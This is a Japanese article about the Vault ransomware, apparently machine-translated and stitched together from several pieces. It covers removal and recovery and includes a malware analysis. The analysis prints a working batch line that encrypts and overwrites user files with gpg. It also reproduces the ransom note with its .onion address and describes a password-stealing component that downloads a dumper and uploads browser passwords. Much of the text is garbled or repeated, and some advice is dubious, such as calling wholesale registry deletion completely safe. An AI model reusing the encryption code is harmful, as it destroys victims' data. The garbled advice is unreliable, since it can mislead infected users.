Vault ウイルスのトピックは今日に非常に関連しています。 ほとんどのユーザーは、自分のコンピュータが感染した場合に何をすべきか、そしてマルウェアを削除する最適な方法は何であるかに興味を持っています。 これについてはこの記事で説明します。

Vault ウイルスとは何ですか?

マルウェアの削除の問題に触れる前に、マルウェアの一般的な概念を理解しておく必要があります。 Vault ウイルスはデータ暗号化ツールです。 オペレーティング システムに侵入し、コンピュータ内に存在するすべてのデータの拡張子を変更することができます。 感染がシステム ファイルに到達した場合、問題は特に悪化します。

デバイスが Vault ウイルスに感染した場合は、まずウイルスがどこから来たのかを理解する必要があります。 問題は、データ暗号化機能が異なっていることです。 一部のユーザーにとってはファイルをアーカイブするためのプログラムとして機能しますが、他のユーザーにとっては特別なブラウザ拡張機能として機能します。 いずれの場合も、解決策は 1 つだけです。Vault ウイルスを早急に駆除する必要があります。

検査の実施

最初のステップは、システム内にスパイウェアや悪意のあるファイルが存在するかどうかデバイスをチェックすることです。 このためには、効果的なウイルス対策が必要です。 最適なオプションは Dr.Web または Nod32 です。 アバストを使用することもできます。 まずウイルス データベースを更新し、次にディープ スキャンを実行する必要があります。 この手順には多くの時間がかかります。

プロセスが完了したら、得られた結果を分析できます。 提示されたリストには、間違いなく Vault ウイルスが含まれています。 残りのアクションは予測できます。 すべてのマルウェアを修復する必要があります。 これができない場合は、それらを完全に削除する必要があります。 ウイルス対策ソフトにはこのための特別なボタンがあります。 コンピュータをスキャンしたら、次のステップに進む必要があります。

プログラムのアンインストール

まず、長期間使用されていないあらゆる種類の奇妙なコンテンツやプログラムを削除する必要があります。 一般に、Vault ウイルスは、データの暗号化に役立つさまざまな役に立たないコンテンツを好んで書き込むという事実によって区別されます。 それらを削除すると、問題の解決策が簡素化されます。

まず、「コントロールパネル」に移動し、「プログラムの追加と削除」を選択する必要があります。 ダウンロードされたコンテンツのリストが作成されるまで、少し待つ価値があります。 この後、見慣れないプログラムをすべて削除する必要があります。 同時に、長期間誰も使用していないアプリケーションをデバイスから消去することができます。 このプロセスが完了したら、ウィンドウを閉じて、タスクを解決するために必要な次の手順に進みます。

レジストリのクリーニング

Vault ウイルスを削除しようと決めたほとんどのユーザーは、レジストリに十分な注意を払っていません。 しかし無駄だった。 結局のところ、それは悪意のあるプログラムを登録するものであり、多くの場合、それを取り除くのは非常に困難です。 したがって、レジストリのクリーニングを必ず検討する必要があります。 これを行うには、必要なサービスへのアクセスを支援する特別なコマンドを実行する必要があります。

まず、「Win + R」をクリックしてから、regedit コマンドを実行する必要があります。 「Enter」ボタンを押すと、コンピュータのレジストリが開きます。 必要なサービスを利用した後、問題を正常に解決するには何が必要かを考える価値があります。 左側には長い名前のフォルダーがたくさん表示されます。 それらはバイパスする必要があります。 最大の目的は「編集」です。

そこで「検索」を見つけて、行に「Vault」と入力する必要があります。 この後、デバイスをスキャンし、スキャン結果を待つ必要があります。 スキャンの結果、悪意のあるファイルが検出された場合は、削除する必要があります。 このプロセスは完全に安全であるため、オペレーティング システムに損傷を与えることを心配する必要はありません。 行を右クリックして「削除」コマンドを選択するだけです。 すべての準備ができたら、先に進むことができます。 ランサムウェアの問題を解決するには、いくつかの基本的な手順が残されています。

プログラムヘルプ

マルウェアを除去するプロセスには、追加のユーティリティの使用が含まれます。 これらを使用すると、ウイルスを見つけて無力化することでデバイスをウイルスから保護できます。 たとえば、Cclener が最適なオプションです。 このプログラムはコンピューターをクリーンアップする優れた仕事をし、システム ドライブ C のスペースを解放するのにも役立ちます。

CCleaner をダウンロードして、時間をかけてインストールするだけです。 次に、必要なスキャン設定を設定する必要があります。 これはウィンドウの左側で行われます。 この後、安全に「スキャン」ボタンをクリックできます。 スキャン結果が画面に表示されるまでに数秒しかかかりません。 「クリア」ボタンをクリックして、受信したデータを分析するだけです。

SpyHunter を使用してランサムウェアを駆除することもできます。 このプログラムは、マルウェアやスパイウェアのほか、システムに脅威をもたらすその他のファイルを検出できます。 インストールとスキャンが完了したら、コンピューターを再起動することをお勧めします。 その結果、ウイルスによってユーザーに不都合が生じることはありません。

ファイルを使用したアクション

すべての手順が完了すると、通常、「個人データが暗号化されている場合はどうすればよいですか?」という疑問が生じます。 このタスクに対処するにはいくつかの方法があるため、各ユーザーは自分にとって最適なオプションを選択できます。 最初の方法は、すべてのファイルをメディアに書き込む特に慎重な人に適しています。

この場合、破損したコンテンツをすべて削除し、システムに脅威を与えない別のコンテンツに置き換えることができます。 2 番目の方法では、特別なウイルス対策プログラムを使用します。 暗号化されたデータをサービスに送信する必要があり、サービスは復号化データを送信します。 Dr.Web プログラムは、このタスクに完璧に対応するため、非常に人気があります。

コンピューター技術の発展の過程で、いくつかのウイルスが存在しました。 コンピュータや携帯電話のメモリを詰まらせたり、ファイルを削除したり、置き換えたりするなど、その形態は誰もが知っています。 しかし、最も危険なのはランサムウェア ウイルスです。 これらは、トロイの木馬、または特に危険な Vault ウイルス (文字通りには「暗号化」と訳されます) である可能性があります。 これらは、ユーザーが開くさまざまな文字で暗号化されており、それによってウイルスの侵入プロセスが開始されます。 そうなると、すべてのファイルが暗号化され、元に戻すことは非常に困難になるか、不可能になります。 ハッカーはこれを当てにして、情報の返却と引き換えに金銭を要求します。

Vault ランサムウェア ウイルス - それは何ですか?

Vault は最も危険なウイルスの 1 つと考えられています。 一部のウイルス対策プログラムはそれを認識しません。 最も頻繁にファイルする 拡張機能が付属しています.js。 したがって、そのような拡張子を持つ要素を開く前に、それをよく見てください。 起動後、PC 上のファイルを読み取り、開発者のサーバーから情報を暗号化するための特別なユーティリティをダウンロードするために時間がかかります。 暗号化プロセスがすぐに開始されます プログラムをダウンロードした後。 Windows の動作に必要なデータを除き、コンピューター上のさまざまなディスク上のすべてのデータがエンコードされます。

Vault エンコーダは、RSA 1024 暗号化アルゴリズムを備えた無料の GPG プログラムです。このユーティリティは簡単に実行できます。 すべての保護をバイパスします本質的にはウイルスではないため、アンチウイルス。 次に、公開鍵と秘密鍵が作成されます。 クローズされたものは開発者または攻撃者のサーバーに残り、オープンされたものは感染したユーザーのコンピュータに残ります。

一定の時間が経過すると、コンピュータ上のほぼすべての情報が暗号化され、すべての情報には *.vault 拡張子が付けられ、ユーザーはそれらを完全に制御できなくなります。 そして、ユーティリティはハッカーだけが知っている特別なキーを作成します。

感染経路

このウイルスは、メールやソーシャル ネットワーク、さらには Skype を介したメッセージを通じて、気づかれないようにアーカイブしたり、.js 拡張子が付いたファイルの形式で拡散します。

ユーザーがやり取りする企業からのメッセージとして届く場合もありますが、 支払いを装って会計士向けの何らかの請求書または調整文書。 したがって、送信される内容を注意深く読む必要があります。

最初のアクション

コンピュータの速度が低下したり、過剰なアクティビティが発生したり、ディスク上の一部のファイルがすでに暗号化されている場合は、ボタンを使用してコンピュータの電源を直ちにオフにするか、電源から切断する必要があります。 そうすれば、少なくともデータの一部を保存できるようになります。

ハードドライブを取り外して2台目のPCに接続し、事前にインターネットをオフにします。 有効にした後、ウイルス対策ソフトウェアを使用してすべてを実行し、以下にリストされているファイルを見つけてみてください。

もし キーが見つかりました, 次に、インターネット上で復号化サービスを探します。 情報を復号化し、ドライブ C をフォーマットします。

もし 何も見つかりません、ドライブ C をフォーマットし、後続の手順に進みます。

ボールトを削除する方法

ユーザーがこのウイルスを発見する前に、ユーザーのアクティビティはすでに成功して完了しています。 したがって、データの損失を避けるために次のことを行う必要があります。

• ファイルを保存確認.keyを入力すると、暗号化されたデータ量が表示されます。 そのおかげで、ハッカーは復元する必要があるファイルの数を確認し、一定の量を要求することができます。
• 探す保管庫キー。 このファイルは、暗号化された情報のキーまたは識別子です。
• 保存保管庫.txt。 これには、ハッカーとその Web サイトに関するすべての情報が含まれています。

これらのファイルを Temp フォルダーから保存したら、ファイルを完全にクリアして、Doctor Web ウイルス対策プログラムが提供する CureIT プログラムを実行できます。 次に、個人用デバイスを再起動します。

上記のいずれも Temp フォルダーにない場合は、次のコマンドを使用できます。 標準検索 Vault.key が見つかる可能性は非常に低く、暗号化が完了すると削除されます。 しかし、それが見つかった場合、情報の解読はほぼ完全に保証されます。

暗号化されたファイルの回復

Vault ウイルスが PC を暗号化した場合は、いくつかの方法で暗号化されたファイルを復元できます。 復号化キーはハードドライブにしばらく保存され、すべてが完了するとハッカーのサーバーに送信され、PC から削除されます。

彼を見つけるまでにはまだ時間がかかるかもしれない。 それは Secret.gpg と呼ばれます。 [マイ コンピュータ] に移動し、右上隅の検索バーにある場合 名前を入力「Enter」ボタンを押すと、システムはこのファイルを見つけようとします。 これを開くと、復号化ツールが保存されているサイトのログイン名とパスワードを取得できます。 これを行う方法の詳細については、以下のビデオをご覧ください。

バックアップを作成した場合は、自分でバックアップからデータを復元してみることもできます。 エンコードされた要素を右クリックし、項目「 プロパティ」 「セクションを探しています」 以前のバージョン」と復元します。 この機能がシステムで有効になっている場合、これは機能します。

詐欺師への支払い

もちろん、情報を回復できない場合に情報を失わないようにするために、攻撃者自身に連絡して料金を支払うこともできます。 ただし、サーバーは 24 時間稼働しているわけではないため、フィードバックが機能するまでに数時間待つ必要があります。 さらに、お金を支払った後、Vault の作成者がすべてのファイルを復号化するという事実はありません。

ただし、多数のレビューから判断すると、詐欺師は実際に情報を解読します。 この点において、詐欺師は非常に慎重です。柔軟な割引システム (ユーザーが再び同様のウイルスに感染した場合) や技術サポートさえあります。

感染後には、Web サイトに関するすべての情報と連絡先がメモ帳に記録されます。

ウイルス対策ラボは何を提供しますか?

たとえば、ウイルス対策 研究室ドクターウェブ感染を検出した後は、ファイルを削除せず、システムをクリーニングせず、すべてを元の場所に放置することを推奨します。 そして、その後の声明で警察に連絡してください。 サンプル アプリケーションはリンク http://legal.drweb.ru/templates にあります。

この後、ウイルス対策テクニカル サポートに連絡し、暗号化された要素のコピーを提供する必要があります。 あとはサポートサービスからの返答を待つだけです。 しばらくして、Dr.Web からの応答レターで Vault 復号化ツールを受け取ります。 残念ながら、この機能は、有料のウイルス対策パッケージを購入したユーザーのみが利用できます。

U カスペルスキー アンチウイルスこれには、Vault decryptor という特別な復号ツールもあります。 これは、暗号化されたファイルを独自に検索して復号化するプログラムです。

あなたが持っている場合 ウイルス対策エセド うなずく 32 場合は、このウイルス対策ソフトウェアを使用してシステムをスキャンして駆除し、テクニカル サポートに連絡する必要があります。 [メールで保護されています]。 ライセンスを取得したウイルス対策ソフトウェアを使用している場合にのみ、テクニカル サポートにお問い合わせください。

U ウイルス対策アバスト Vault ウイルスを復号化するための特別なユーティリティがあります。 これらはアバストの公式 Web サイトで見つけることができます。

Vault ウイルスから身を守る方法

このようなウイルスから身を守るには、次のことを行う必要があります。

• .js 拡張子のファイルを開いたり、スキャンのためにウイルス対策ソフトに送信したりしないでください。
• PC からのすべての重要な情報をクラウド ドライブに保存します。
• 海賊版ユーティリティをダウンロードしたり、コンピュータにインストールしたりしないでください。

最近、ユーザーは新しい脅威、標準の拡張子を置き換えることによってファイルを暗号化するウイルスに遭遇しました。 その結果、文書、音声およびビデオの記録、画像にアクセスできなくなります。 攻撃者は復号キーとして多額の金銭を要求します。

暗号化は非常に危険であるため、大規模な組織でも暗号化から逃れることはできません。たとえば、2016 年 2 月、ハリウッド長老派医療センターは、復号キーの購入として攻撃者に 17,000 ドルを支払わなければなりませんでした。 どのランサムウェアがハリウッドで機能したかは不明ですが、Runet ユーザーは通常、Vault ウイルスに遭遇します。 それでは、可能であれば、Vault ウイルスに感染した後にファイルを回復する方法を見てみましょう。

Vault ウイルス後にファイルを回復する方法

ウイルスの検出

この感染は見逃しにくいものです。ファイルの拡張子が自動的に .vault に変更され、開かなくなり、「データはブロックされました。」のようなメッセージが表示されます。 それらを復元するには、一意のキーを取得する必要があります。」 通常、以下は Web サイトのアドレスと、復号化コードの支払いと受け取りの手順です。

このようなメッセージが表示された場合は、直ちにコンピュータの電源を切り、すべてのリムーバブル メディアを取り外す必要があります。 Vault は情報を段階的に暗号化するため、一部のファイルを保存する時間があります。

しかし、ウイルスはどのようにしてコンピュータに侵入したのでしょうか? おそらく電子メールで。 ユーザーは重要な件名 (信用債務、召喚状、支払い確認など) が記載された手紙を受け取り、メッセージを開きます。その後、暗号化プログラムと、復号化コードの支払い手順が記載された Vault バナーがコンピューターにダウンロードされます。

暗号化には、RSA-1024 アルゴリズムを使用する無料で無害な GPG プログラムを使用します。 正式には、これはウイルスではないため、機能しません。 しかし、情報を復号化するために必要なキーはハッカーの手元に残り、コードを解読することは不可能です。値を調べるのに数年かかります。 したがって、不明な送信者からのメールは開かないでください。

ランサムウェアの削除

Vault の削除は非常に簡単です。Vault はシステムに深く侵入することはなく、情報へのアクセスをブロックするだけで生命を損ないます。 システムをクリーニングするには、Dr.Web CureIt! を使用してください。 またはカスペルスキーウイルス削除ツール。 これらのユーティリティは Windows セーフ モードで実行する必要があります。

手順は簡単です。

さらに、C:\Users\User\AppData\Loca\Temp の隠しフォルダーに保存されている Vault コンポーネントを削除する必要があります。 悪意のあるコードの構造は次のとおりです。

• 3c21b8d9.cmd。
• fabac41c.js。
• 04fba9ba_VAULT.KEY。
• VAULT.txt。
• Sdc0.bat。
• 確認キー。
• 保管庫キー。

最後の 2 つのコンポーネントは、復号化のために攻撃者に料金を支払うことにした場合に役立ちます。 これらには、キーの公開部分 (ハッカーにはコードを削除できない非公開部分があります) と暗号化されたデータの量に関する情報が保存されます。

別のオプションがあります。Kaspersky Rescue Disk をフラッシュ ドライブに書き込み、そこからコンピュータを起動します。 動作するコンピューター、フラッシュドライブ、書き込みユーティリティ、および Kaspersky Rescue Disk 10 のイメージが必要です。

ファイルの復号化

マルウェアにはすぐに対処できますが、深刻な問題が発生します。RSA-1024 アルゴリズムを使用して暗号化された情報へのアクセスを迅速に開く復号化ツールがありません。 大手ウイルス対策ソフトウェア開発者の立場は、コードを解読する技術的能力を持たないということです。 したがって、いくつかの選択肢が残されています。

• あまり価値のない情報が失われた場合は、コンピュータから削除する方が簡単です。 そして、未知の差出人からの奇妙な手紙を開く必要はないことを覚えておいてください。
• 暗号化されたデータに価値がある場合は、ウイルス ソフトウェアの送信者に料金を支払う必要があります。 騙されないという確信はないので、これは極端な選択肢です。 さらに、攻撃者に金銭をもたらすため、感染した電子メールを送信し続けることを奨励します。

利用可能な復号化方法のうち、いくつかのオプションを試すことができますが、良い結果が得られるという保証はありません。

1. 主要なウイルス対策ソフトウェア開発者のテクニカル サポート フォーラムにアクセスしてください。 カスペルスキー、Dr.Web、ESET。 ランサムウェア データベースは絶えず拡大しています。 問題を詳しく説明してください。おそらく、問題を解決するツールがあるでしょう。
2. ファイルのシャドウ コピーを使用します (システム保護が有効になっている場合に関連します)。

暗号化されたファイルのプロパティを開き、「以前のバージョン」タブに移動します。

以前の暗号化されていないエディションがある場合は、それらを開くか復元できます。 この場合、拡張子 .vault を持つデータをコンピュータから削除する必要があります。 残念ながら、他の作業方法はありません。 したがって、ランサムウェアに遭遇しないようにすることをお勧めします。見知らぬ手紙を開かない、不審なプログラムをダウンロードしない、未知のリンクをたどらないようにしてください。

親愛なる読者の皆さん、こんにちは。 私は偶然、ユーザーデータを標準の拡張子に置き換えることで暗号化する、非常に不快で危険な暗号化プログラムに遭遇しました。 Vault ランサムウェア ウイルスに感染すると、すぐに主要な疑問が生じます。それは、破損したファイルを復元し、情報を復号化する方法です。 残念ながら、マルウェアの動作メカニズムの特殊性と攻撃者の機知により、この問題に対する簡単な解決策はありません。

Vault ランサムウェア ウイルスの説明

すべては、次の内容を含むテキスト ファイルをメモ帳で突然開くことから始まります。

作業中のドキュメントとデータベースはブロックされ、.vault 形式でマークされています。これらを復元するには、一意のキーを取得する必要があります。 簡単に説明します。 1. Web リソースにアクセスします。 2. キーを受け取ることが保証されています。ファイルを以前の形式に復元します 詳細 ステップ 1: 公式 Web サイトから Tor ブラウザをダウンロードします: https://www.torproject.org ステップ 2: Tor ブラウザを使用して、サイトにアクセスします: http://restoredz4xpmuqr.onion ステップ3: コンピュータ上で独自の VAULT.KEY を見つけます。これが個人クライアント パネルへのキーです。 削除しないでください。 VAULT.KEY キーを使用してサイトにログインします。 FAQ セクションに移動して、詳しい手順を読んでください。 ステップ 4: キーを受け取った後、オープン ソース ソフトウェアを使用してファイルを復元するか、独自のソフトウェアを追加で安全に使用できます。 ) 一意のキー (当社のサーバーに安全に保存されています) がなければファイルを回復することはできません。 b) VAULT.KEY が見つからない場合は、一時フォルダー TEMP を調べてください。 c) 回復コストは最終的なものではありません。チャットのブロック日: 04/08/2015 (11:14)

このようなメッセージが表示されるということは、すでに次のことを意味しています。 ボールトウイルスコンピュータが感染し、ファイルの暗号化が開始されました。 この時点で、直ちにコンピュータの電源を切り、ネットワークから切断し、すべてのリムーバブル メディアを削除する必要があります。 ウイルスの治療方法については後ほど説明しますが、ここではシステム内で何が起こったのかを説明します。

おそらく、信頼できる取引相手から、または有名な組織を装った手紙を郵便で受け取った可能性があります。 これは、一定期間の会計調整を行う要求、契約に基づく請求書の支払いを確認する要求、ズベルバンクの信用債務についてよく知るための申し出、またはその他のものである可能性があります。 しかし、その情報は確かに興味を持ち、ウイルスが添付された電子メールの添付ファイルを開いてしまうようなものです。 これが私たちが期待していることです。

そこで、.js 拡張子を持つ Java スクリプトである添付ファイルを開きます。 理論的には、これはすでに警告を発し、開くのを阻止するはずですが、これらの行を読んでいるということは、警告も阻止もされなかったことを意味します。 このスクリプトは、トロイの木馬または Banner Vault (この場合は呼び出される可能性があります) と暗号化プログラムを攻撃者のサーバーからダウンロードします。 すべてをユーザーの一時ディレクトリに置きます。 また、ファイル暗号化のプロセスは、ネットワーク ドライブ、フラッシュ ドライブ、外付けハード ドライブなど、ユーザーがアクセスできるすべての場所ですぐに開始されます。

Vault は、ランサムウェアとして機能する無料の暗号化ユーティリティです。 GPGそして人気のある暗号化アルゴリズム - RSA-1024。 本質的に、このユーティリティは多くの場所で使用されており、それ自体はウイルスではないため、ウイルス対策ソフトはこのユーティリティを通過させ、その動作をブロックしません。 ファイルを暗号化するために公開キーと秘密キーが生成されます。 秘密キーはハッカーのサーバー上に残り、ユーザーのコンピュータ上で開かれたままになります。

暗号化プロセスが開始されてからしばらく時間がかかります。 ファイルのアクセス速度、コンピューターのパフォーマンスなど、いくつかの要因によって異なります。 次に、テキスト ファイルに情報メッセージが表示されます。その内容は最初に提供したものです。 この時点で、一部の情報はすでに暗号化されています。

具体的には、32 ビット システムでのみ動作する vault ウイルスの修正版に遭遇しました。 さらに、UAC が有効になっている Windows 7 では、管理者パスワードの入力を求めるポップアップが表示されます。 パスワードを入力しない限り、ウイルスは何もできません。 Windows XP では、メールからファイルを開いた後、何の質問もせずにすぐに動作を開始します。

このウイルスは、doc、jpg、xls、その他のファイルに Vault 拡張子を付けます。

ウイルスはファイルに対して正確に何をするのでしょうか? 一見すると、拡張子を標準から拡張子に変更しただけのように見えます。 .vault。 このウイルス暗号化ツールの働きを初めて見たとき、私はこれは子供じみた詐欺だと思いました。 ファイルの名前を元に戻しましたが、期待どおりに開かず、必要なコンテンツの代わりに、理解できない記号の混乱が開いたので非常に驚きました。 それから、すべてがそれほど単純ではないことに気づき、それを理解して情報を探し始めました。

このウイルスは、一般的なすべてのファイル タイプを攻撃しました - 博士, ドキュメント, xls, xlsx, jpeg, pdfその他。 標準のファイル名に新しい拡張子 .vault が追加されました。 一部の場合は、ローカル 1C データベースを使用してファイルも暗号化します。 私はこれらを持っていなかったので、個人的には観察しませんでした。 ご理解のとおり、単にファイルの名前を元に戻すだけでは、ここでは役に立ちません。

暗号化プロセスは即時ではないため、コンピュータにウイルスが存在していることが判明したときに、一部のファイルはまだ正常であり、一部のファイルは感染している可能性があります。 ほとんどがそのまま残っていれば良いのですが。 しかし、ほとんどの場合、これを当てにすることはできません。

拡張機能の変更の背後に何が隠されているかを説明します。 たとえば、その隣にあるファイル file.doc を暗号化した後、vault ウイルスは暗号化されたファイル file.doc.gpg を作成し、暗号化された file.doc.gpg が新しい名前 file で元のファイルの場所に移動されます。 .doc になり、その後のみファイル名が doc.vault に変更されます。 元のファイルは削除されず、暗号化された文書で上書きされていることがわかりました。 その後、削除されたファイルを回復するための標準ツールを使用して復元することはできません。 以下は、同様の機能を実装するコードの一部です。

Dir /B "%1:"&& for /r "%1:" %%i in (*.xls *.doc) do (echo "%%TeMp%%\svchost.exe" -r Cellar --yes - q --no-verbose --trust-model always --encrypt-files "%%i"^& move /y "%%i.gpg" "%%i"^& rename "%%i" "%% ~nxi.vault">> "%temp%\cryptlist.lst" echo %%i>> "%temp%\conf.list")

ウイルス 感染 Vault ファイルは暗号化されています

まずユーザーが受け取るのは、 税務署/水道メーター/コンサルタントの口座からの抜粋に関するメッセージを含む手紙とコンサルタント.
手紙にはリソースからの添付ファイルへのリンクが含まれていました ダウンロード-添付.com。 (ホスティングの料金はビットコインで支払われるようです) このリンクのアーカイブには最も興味深いものが含まれています 難読化されたjsファイル、非常に詳細な名前が付けられています。
実行するとき %TEMP% ユーザーいくつかのファイルが表示され、スタートアップ スクリプトがスタートアップに書き込まれます。 revault.js

特定されたファイルの一部を次に示します。
svchost.exe - メインの gnupg バイナリ
iconv.dll - gnupg を実行するための共有ライブラリ
audiodg.exe - Sysinternals Suite からの削除

ウイルスの実行 Vault ファイルは暗号化されています

この例では、コンピューターの起動時に revault.js スクリプトが起動され、バット ファイル cryptlist.cmd が起動されました。 ここで少し糸が抜けてしまいました
それから始まりました secure.bat最も暗い出来事がすべて起こる場所です。
まず、プログラムは gk.vlt (Cellar/RSA/1024 ビット) という名前のコンピューター上のファイルを暗号化するための証明書を生成します。
次に、ファイルを vaultkey.vlt ファイルに復号化するために必要な秘密キーをそこからエクスポートします。
次に、公開キー pk.vlt を作成します。これは、bat ファイル自体に事前定義されています。 このファイルは、後でデータの復号化に必要なキーを暗号化するために使用されます。

次にvaultkey.vltを書きます
BDATE - 現在の日付
UNAME - 現在のユーザー名
CNAME - コンピュータ名
ULANG - システム言語 (この場合は RU と書かれています)
そしていくつかのランダムなハッシュ 01HSH 02HSH 03HSH 04HSH 05HSH FHASH

ウイルス暗号化 Vault ファイルは暗号化されています

置換によるファイル暗号化はこんな感じ
1 - ファイルの暗号化
2 - 暗号化されたファイルを元の場所に移動する
3 - ファイルに .vault 拡張子を追加する

ステージ 1 では、*.xls および *.doc ファイルが暗号化されます。
ステージ 2 では、ファイル win.vbs、sdwrase.js、sdwrase.cmd が作成および起動されます。これにより、システムが Vista 以降の場合、システム内のシャドウ コピーが無効になります。
また、*.pdf *.rtf ファイルは暗号化されます。
ステージ 3 では、*.psd *.dwg *.cdr ファイルが暗号化されます。
ステージ 4 では、*.cd *.mdb *.1cd *.dbf *.sqlite ファイルが暗号化されます。
ステージ 5 では、*.jpg *.zip ファイルが暗号化されます。

各ファイルがカウントされ、各ファイル タイプの暗号化されたファイルの数が vaultkey.vlt に書き込まれます。
(暗号化されたデータの一般的な評価用と思われます)

次に、秘密キーと収集されたデータ量に関する情報が攻撃者のキーで暗号化されます。
その後、データの復号化に必要なキーは 16 (!) 回の書き換えで削除されます。

ファイルはあなたのキーで暗号化され、あなたのキーは攻撃者のキーで暗号化されます。

次に、アラートを含むファイルが作成されます。

ウイルスウェブサイト Vault ファイルは暗号化されています

攻撃者の Web サイトは匿名の TOR ネットワーク上でホストされており、この種の「プロジェクト」としては高度に技術的に進歩しています。
本格的な個人アカウントと 3 つのファイルの「デモ バージョン」があり、攻撃者はアップロードしたファイルを復号化し、サーバーからダウンロードすることができます。 ただし、ファイルへのアクセスを許可する前に、攻撃者はファイルを手動で確認し、ファイルが重要であると判断した場合、そのトピックへのアクセスは許可されず、そのことが通知されます。

ヘルプセクションもあります。

支払いはビットコインのみ。
著者と話すこともできます。 説得も脅しも無駄だ。 攻撃者はチャット オプションをブロックする可能性があります。

ブラウザのパスワード - ウイルスに感染したブラウザからパスワードを盗む手法 Vault ファイルは暗号化されていますコンピューター

通知付きファイルを作成した後は「ボーナス」があります
Ultra.js および up.vbs スクリプトが作成されます。
最初の方法では、リンク hxxp_//tj2es2lrxelpknfp.onion.city/p.vlt を介して tor2web ゲートウェイからファイルをダウンロードし、名前を ssl.exe に変更します。
これは、SecurityXploded によるパスワード ダンプ ブラウザ パスワード ダンプ v2.6 です。
すべてのブラウザのパスワードを cookie.vlt に保存します。
次に、2 番目のファイルが同じサーバーへのパスワードのアップロードを開始します (スクリプト /x.php への POST)。
このサーバーは、回収および支払い用のサーバーと同じ方法で匿名化されます (ヘッダーには何も追加せず、サーバー: Anon の行)